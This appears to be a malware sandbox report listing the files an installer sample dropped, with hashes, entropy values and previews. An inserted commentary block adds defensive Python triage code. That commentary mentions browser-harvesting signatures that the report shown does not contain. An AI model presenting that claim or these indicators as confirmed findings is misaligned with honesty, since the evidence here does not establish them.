                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                        MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                        SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                        SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                        SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                        MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                        SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                        SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                        SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:FoxPro FPT, blocks size 512, next free block index 3284796353, field type 0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):262512
                                                                                                                                                                                                        Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:LsFl0lejRP/t:LsFKetP/t
                                                                                                                                                                                                        MD5:9EE030F215E7AA96872F7C76AB1BB3E1
                                                                                                                                                                                                        SHA1:1BB26758E48F3EAB2779C2C5D1BA41EAB7133A3B
                                                                                                                                                                                                        SHA-256:D15CFA3F5A78701FE2E8A93F5329153E5D91847D671CF5F9B304D9DAED8521C2
                                                                                                                                                                                                        SHA-512:C84BB22FB9F7C476459577B25A4D39B152872070F5536E871B9B6A7E47D0C322D9473D70D5BF95921191B2E88F46978AE0DE08B1F643E59FFF4A9CFD0D0AA256
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............................................4./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15119
                                                                                                                                                                                                        Entropy (8bit):5.63468773874796
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                                                                                                                                                                        MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                                                                                                                                                                        SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                                                                                                                                                                        SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                                                                                                                                                                        SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15119
                                                                                                                                                                                                        Entropy (8bit):5.63468773874796
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                                                                                                                                                                        MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                                                                                                                                                                        SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                                                                                                                                                                        SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                                                                                                                                                                        SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15119
                                                                                                                                                                                                        Entropy (8bit):5.63468773874796
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                                                                                                                                                                        MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                                                                                                                                                                        SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                                                                                                                                                                        SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                                                                                                                                                                        SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15119
                                                                                                                                                                                                        Entropy (8bit):5.63468773874796
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                                                                                                                                                                        MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                                                                                                                                                                        SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                                                                                                                                                                        SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                                                                                                                                                                        SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15119
                                                                                                                                                                                                        Entropy (8bit):5.63468773874796
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                                                                                                                                                                        MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                                                                                                                                                                        SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                                                                                                                                                                        SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                                                                                                                                                                        SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
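Added example, not part of the Joe Sandbox report: a small Python triage pass over records shaped like the "Dropped Files" entries above. It recomputes the bits-per-byte scale that the "Entropy (8bit)" field uses, to show that the ~0.01 values reported for the 8192-byte "data" files mean near-total null padding, and it groups records by SHA-256 to surface the pattern visible in the entries above, where msiexec.exe writes a file byte-identical (same SHA-256) to one written by chrome.exe and msedge.exe, which is consistent with the report's browser-harvesting signatures. The sample records are constructed from field values on this page with the SSDEEP, MD5, SHA1 and SHA-512 fields left out; BROWSER_PROCESSES and the 0.05 entropy threshold are assumptions of this example, not report settings.

```python
import math
from collections import defaultdict

# Constructed sample in the shape of the report's "Dropped Files" records above.
# Hashes and entropies are the values printed on the page; the other fields are omitted
# only to keep the sample short.
SAMPLE_RECORDS = """\
Process:C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
File Type:data
Size (bytes):8192
Entropy (8bit):0.011852361981932763
SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
Process:C:\\Windows\\SysWOW64\\msiexec.exe
File Type:JSON data
Size (bytes):15119
Entropy (8bit):5.63468773874796
SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
Process:C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
File Type:JSON data
Size (bytes):15119
Entropy (8bit):5.63468773874796
SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
Process:C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
File Type:JSON data
Size (bytes):15119
Entropy (8bit):5.63468773874796
SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
"""

# Assumption: stock Chrome/Edge are the only legitimate writers of browser profile files.
# Any other process writing a byte-identical copy deserves a look in a report that already
# flags browser-credential harvesting.
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe"}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), the scale of the 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_records(text: str) -> list:
    """Split 'Key:Value' lines into one dict per record; a 'Process:' line starts a record."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)  # first colon only: paths and SSDEEP contain colons
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def process_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def drops_by_hash(records: list) -> dict:
    """SHA-256 -> set of process names that wrote a file with that hash."""
    owners = defaultdict(set)
    for r in records:
        if "SHA-256" in r:
            owners[r["SHA-256"].upper()].add(process_name(r["Process"]))
    return dict(owners)


def cross_process_copies(records: list) -> dict:
    """Hashes written both by a browser and by a non-browser process (the msiexec.exe case)."""
    return {h: procs for h, procs in drops_by_hash(records).items()
            if procs & BROWSER_PROCESSES and procs - BROWSER_PROCESSES}


def near_empty(record: dict, threshold: float = 0.05) -> bool:
    """True when the reported entropy says the file is essentially null padding."""
    return float(record["Entropy (8bit)"]) < threshold


def triage(text: str) -> dict:
    records = parse_records(text)
    return {
        "records": len(records),
        "near_empty": sum(near_empty(r) for r in records),
        "cross_process": cross_process_copies(records),
    }


if __name__ == "__main__":
    # An 8 KiB buffer with eight non-zero bytes lands at the ~0.01 entropy the 'data' entries report.
    sparse = bytearray(8192)
    sparse[0:8] = b"\x01" * 8
    print(f"sparse 8 KiB entropy: {shannon_entropy(bytes(sparse)):.4f}")
    print(triage(SAMPLE_RECORDS))
```

The threshold is deliberately loose: an all-null file scores exactly 0.0, and a handful of non-zero bytes in 8 KiB still stays near 0.01, so anything below 0.05 can be treated as a placeholder rather than content worth carving. The cross-process check only uses fields the report already prints, so it runs on the full listing without access to the sample files themselves.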
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:COM executable for DOS
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):184
                                                                                                                                                                                                        Entropy (8bit):0.6472473490380266
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:s3lt/elaaRH:sVwpH
                                                                                                                                                                                                        MD5:24127606DAC5CC6142848B0387A3AFB6
                                                                                                                                                                                                        SHA1:2DD825CBA2DED5F73DE2F70D3056764788D6B3CD
                                                                                                                                                                                                        SHA-256:7680B8117DCE679EAF37A1C4670506FDA78781CFCD994295B5108DB18FBBC3A8
                                                                                                                                                                                                        SHA-512:0C37B62B580255716371554CD47A1D7AA15A92B5376FF66D42CACF1E2FD95C027E7F8781231C4B0D9CCC17521A94F1E719CFD2307853D6D7D72DD8155BA6868B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:..............@?........................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:COM executable for DOS
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):184
                                                                                                                                                                                                        Entropy (8bit):0.6472473490380266
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:s3lt/elaaRH:sVwpH
                                                                                                                                                                                                        MD5:24127606DAC5CC6142848B0387A3AFB6
                                                                                                                                                                                                        SHA1:2DD825CBA2DED5F73DE2F70D3056764788D6B3CD
                                                                                                                                                                                                        SHA-256:7680B8117DCE679EAF37A1C4670506FDA78781CFCD994295B5108DB18FBBC3A8
                                                                                                                                                                                                        SHA-512:0C37B62B580255716371554CD47A1D7AA15A92B5376FF66D42CACF1E2FD95C027E7F8781231C4B0D9CCC17521A94F1E719CFD2307853D6D7D72DD8155BA6868B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:..............@?........................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                        Entropy (8bit):1.23900521981086
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MlwlaaRX:kwpX
                                                                                                                                                                                                        MD5:3F66F244278461DD07A3FEB77A17712F
                                                                                                                                                                                                        SHA1:8D570B550699AD0F248EC98B5D678F54248C0A84
                                                                                                                                                                                                        SHA-256:203CE5C7C1680C6E98F5CECA920E9D904122A9E26A743191E9B0FE1F6584ED60
                                                                                                                                                                                                        SHA-512:8D4733222E2E0BBC18370055D0602D0389E7A562887E97B2E54073017FFEA024E9B1341ED95E28883861EF5E0D4FA9D27ED0894912FFE167632AED2E4CF53E7D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:H.......0.....@?........................................................
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x2cbb85f5, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14680064
                                                                                                                                                                                                        Entropy (8bit):0.14200681157865014
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:fSB2w+SB2wdSjlK/zAuvJgvs4zG2yeurJgxs4RG2yD0Hwhc3P0JCPOdNuzZuFTFf:faYacSWj7iOjDyMPwE
                                                                                                                                                                                                        MD5:9C31A797A681D2C51AEB25234300C80F
                                                                                                                                                                                                        SHA1:044C77D208AB337F9D80A981F5CB6BE488988D76
                                                                                                                                                                                                        SHA-256:8210BAB7533D2BA23D97911B72F6AC55784230F156B8067D5D4A1BE7C142B374
                                                                                                                                                                                                        SHA-512:CA0A5D1FA6005F29549976B2C6F14A133684A0CFA1113F44F86ACBFC93C1CD193856CDFD0E987444B4E06424AF530DA1CDF88BD868D24091A32FD76422E1A313
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:,...... ................{..*...y...............................&...|.......|..h...........................4B...*...y..........................................................................................................bJ......n........................................................................................................... .......1;...|...............................................................................................................................................................................................*...y_.................................}G.......|....................J......|...........................#......h.......................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\msiexec.exe
File Type: Unicode text, UTF-16, little-endian text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Preview: ..
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.805842466953427
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: rPO3799039985.exe
File size: 687'803 bytes
MD5: efb9125831992267d27c5dd9a2bdc0be
SHA1: 0be2e44632121c8fc2f325ed4af6b91e49486711
SHA256: 7028c43edb1ed93fee2d535a938b07a687d01cf5a5e4dc9e9104d5fa372089ca
SHA512: b3ba5a31a5012907853cef9ee1bc2aefbb084be4dfab095b695065dc1bd460546b7fbce10788010168977562d5a859c471dac44c712b5efa3f0d60cb6ccf1383
SSDEEP: 12288:NiNbeGX4+5+aeLJOwLqgUf5/G2ywJCfANIsCssyKBsFLL+Wlra97H6Vy:ib9l+PMxgGJGhs0iLaWl8ac
TLSH: 92E402A7765284D6C4EB46F01F96D76073FCB8AC87C1074FB2D76A289652383247928F
